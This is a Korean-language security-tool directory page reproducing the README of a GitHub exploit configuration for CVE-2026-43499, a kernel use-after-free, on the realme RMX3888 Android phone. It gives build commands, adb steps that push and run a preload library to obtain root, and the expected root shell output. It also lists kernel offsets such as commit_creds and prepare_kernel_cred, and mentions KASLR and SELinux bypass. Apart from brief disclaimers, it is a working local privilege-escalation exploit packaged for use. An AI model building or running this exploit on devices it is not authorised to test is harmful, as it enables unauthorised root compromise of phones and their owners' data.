Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
rmx3888-cve-2026-43499-config — realme RMX3888(Android 16)용 CVE-2026-43499 익스플로잇 구성 - 검증된 커널 오프셋 20개 | Kitploit
도구/GitHubGitHub/bailan766/rmx3888-cve-2026-43499-config
Android SecurityVulnerability AnalysisExploitationMobile SecurityLearning & EducationPayload DevelopmentBinary Exploitation
GitHubbailan766/rmx3888-cve-2026-43499-config

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

rmx3888-cve-2026-43499-config

realme RMX3888(Android 16)용 CVE-2026-43499 익스플로잇 구성 - 검증된 커널 오프셋 20개

저장소 보기
52121개월 전아직 검토되지 않음

realme RMX3888용 CVE-2026-43499 익스플로잇 구성

기기 정보

  • 브랜드/모델: realme RMX3888
  • Android 버전: 16 (SDK 36)
  • 빌드 ID: BP2A.250605.015
  • 커널: Linux 6.1.141-android14-11-o-gffc54a6d2287
  • SoC: Qualcomm SM8650 (Snapdragon 8 Gen 3)
  • 아키텍처: ARM64 (aarch64)

개요

이 저장소는 realme RMX3888 기기를 대상으로 하는 CVE-2026-43499(GhostLock) 익스플로잇의 완전한 구성 파일을 포함합니다. 모든 커널 오프셋은 기기의 boot.img에서 추출 및 검증되었습니다.

기능

✓ 검증된 커널 오프셋 20개는 vmlinux에서 추출
✓ 실시간 로깅은 커널 패닉 안전을 위한 O_SYNC + fsync 사용
✓ RMX3888 전용 기기 구성
✓ NDK 자동 감지가 포함된 원클릭 컴파일 스크립트
✓ 빌드 가이드를 포함한 종합 문서

포함된 파일

구성 파일

  • arget.h - 기기별 커널 오프셋(검증된 오프셋 20개)
  • common.h - 로깅 통합이 포함된 빌드 구성

ealtime_log.h - 실시간 로깅 구현

문서

  • BUILD_GUIDE.md - 전체 컴파일 가이드

eport.md - 상세 분석 보고서(1차)

ound2_report.md - 구성 보고서(2차)

  • ROUND2_STATUS.md - 실행 상태 요약
  • compile_status.json - 기계 판독 가능한 빌드 상태

스크립트

  • compile_rmx3888.sh - 원클릭 컴파일 스크립트

빠른 시작

사전 요구 사항

  • Android NDK r26d 이상
  • Git Bash, Linux/WSL 또는 Termux 환경

컴파일

root@kitploit:~
git clone https://github.com/Bailan766/rmx3888-cve-2026-43499-config.git
cd rmx3888-cve-2026-43499-config
export ANDROID_NDK_HOME=/path/to/android-ndk
chmod +x compile_rmx3888.sh
./compile_rmx3888.sh

Windows Git Bash에서 스크립트는 Android Studio 및 명령줄 도구에서 사용하는 기본 SDK 경로를 자동 감지합니다: /c/Android/Sdk/ndk/*.

참고: ASHMEM_MISC_FOPS, ASHMEM_COMPAT_IOCTL, COPY_SPLICE_READ는 현재 RMX3888 타깃 헤더에서 빌드 호환 대체 값을 사용합니다. 런타임 동작에 의존하기 전에 검증된 RMX3888 vmlinux 오프셋으로 교체하십시오.

사용법

root@kitploit:~
# Push to device
adb push build/rmx3888-BP2A.250605.015/bin/preload.so /data/local/tmp/

# Set permissions
adb shell chmod 755 /data/local/tmp/preload.so

# Execute exploit
adb shell LD_PRELOAD=/data/local/tmp/preload.so id

# Check logs
adb shell cat /sdcard/Download/log_*.txt

주요 오프셋

아래의 주요 오프셋은 커널 6.1.141에서 추출되었습니다. RMX3888별 검증이 아직 필요한 빌드 호환 대체 항목은 위의 참고 사항을 참조하십시오.

root@kitploit:~
#define KIMAGE_TEXT_BASE        0xffffffc008000000ULL
#define INIT_TASK_OFF           0x0202fc00ULL
#define SECURITY_HOOK_HEADS_OFF 0x015c1488ULL
#define ASHMEM_FOPS_OFF         0x0126bbe0ULL
#define COMMIT_CREDS            0xffffffc0081e9b60 (offset: 0x001e9b60)
#define PREPARE_KERNEL_CRED     0xffffffc0081e9df0 (offset: 0x001e9df0)
// ... 15 more verified offsets

로깅 기능

통합 실시간 로깅 모듈은 다음을 제공합니다:

  • 기본 로그 경로: /sdcard/Download/log_.txt
  • 대체 경로: /data/local/tmp/log_.txt
  • 커널 패닉 안전: 즉시 디스크 쓰기를 위해 O_SYNC + fsync() 사용
  • 타임스탬프 항목: 모든 로그 항목에 정확한 타임스탬프 포함
  • stderr 미러: adb logcat을 위해 로그를 stderr로도 출력

예상 결과

성공적인 익스플로잇

uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),...

로그 파일 출력

` === CVE-2026-43499 Exploit Log Started === Time: 2026-07-23 18:00:00 PID: 12345 UID: 2000 Log Path: /sdcard/Download/log_20260723_180000.txt

[18:00:01] [] Starting exploit... [18:00:02] [+] Kernel base leaked: 0xffffffc008000000 [18:00:03] [] Preparing heap spray... ... `

문제 해결

자세한 문제 해결 지침은 BUILD_GUIDE.md를 참조하십시오:

  • 컴파일 오류
  • 런타임 충돌
  • KASLR 우회 문제
  • SELinux 정책 차단

보안 공지

⚠️ 경고: 이 구성은 승인된 보안 연구용으로만 제공됩니다.

  • 소유한 기기에서만 사용하십시오
  • 승인 없이 컴파일된 바이너리를 배포하지 마십시오
  • 책임 있는 공개 관행을 준수하십시오
  • 로그 파일에는 민감한 시스템 정보가 포함될 수 있습니다

기술 세부 사항

추출 프로세스

  1. Android Boot Image v4 파서를 사용하여 boot.img 압축 해제
  2. vmlinux-to-elf를 사용하여 vmlinux 추출(심볼 102,871개)
  3. 유효한 심볼 99,580개를 파싱 및 분석
  4. 중요 오프셋 20개 교차 검증
  5. 심볼 주소 일관성 검사를 통한 오프셋 검증

오프셋 검증

  • 커널 베이스 주소 확인됨: 0xffffffc008000000
  • 모든 심볼 주소를 메모리 레이아웃과 대조하여 검증
  • 참조 기기(Google Pixel tokay)와 교차 참조
  • 추출 성공률 100% (20/20 오프셋)

참조 자료

  • CVE-2026-43499: GhostLock - Ion 할당기 UAF 취약점
  • 익스플로잇 소스: https://github.com/NebuSec/CyberMeowfia
  • 대상 기기: realme RMX3888 (Snapdragon 8 Gen 3)

라이선스

이 구성은 교육 및 보안 연구 목적으로만 제공됩니다.

고지 사항

이 저장소에는 보안 연구 자료가 포함되어 있습니다. 작성자와 기여자는 이 코드로 인한 오용 또는 손해에 대해 책임을 지지 않습니다. 사용에 따른 책임은 본인에게 있으며, 소유한 기기 또는 명시적 테스트 승인을 받은 기기에서만 사용하십시오.


생성일: 2026-07-23
커널 버전: 6.1.141-android14-11-o-gffc54a6d2287
오프셋 검증: 100% (20/20)
상태: 컴파일 준비 완료

도구 다운로드